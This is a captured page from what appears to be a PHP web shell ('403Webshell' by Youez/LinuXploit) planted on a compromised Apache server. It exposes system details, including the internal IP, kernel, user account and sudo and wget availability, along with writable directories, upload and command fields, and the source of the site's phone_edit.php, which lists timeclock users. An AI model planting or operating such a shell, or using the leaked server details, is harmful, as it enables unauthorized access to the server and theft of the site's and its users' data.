403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/hans_sites/phonelesswork.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hans_sites/phonelesswork.com/phone_edit.php
<?php
	session_start();
	include_once($_SERVER['DOCUMENT_ROOT'].'/php/mysql.php');
	$serial_list = array();
	if(!empty($_SESSION['company_db'])) {
		$res = $db->get_results("SELECT id,serial_number,first_name,last_name FROM timeclock_users_".$db->clean($_SESSION['company_db'])."
								WHERE 1
								ORDER BY first_name,last_name");
		foreach($res as $r) {
			$serial_list[$r->id.'|||'.$r->serial_number] = $r->first_name.' '.$r->last_name;
		}
	}
	ob_start();
	?>
	<h3>User List</h3>
	<?php
	foreach($serial_list as $serial=>$name) {
		?>
		<div class="device_list">
			<a href="phone_edit_user.php?serial=<?= $serial;?>"><?= $name;?></a>
		</div>
		<?php
	}
	$body = ob_get_clean();
	include('layout.php');

Youez - 2016 - github.com/yon3zu
LinuXploit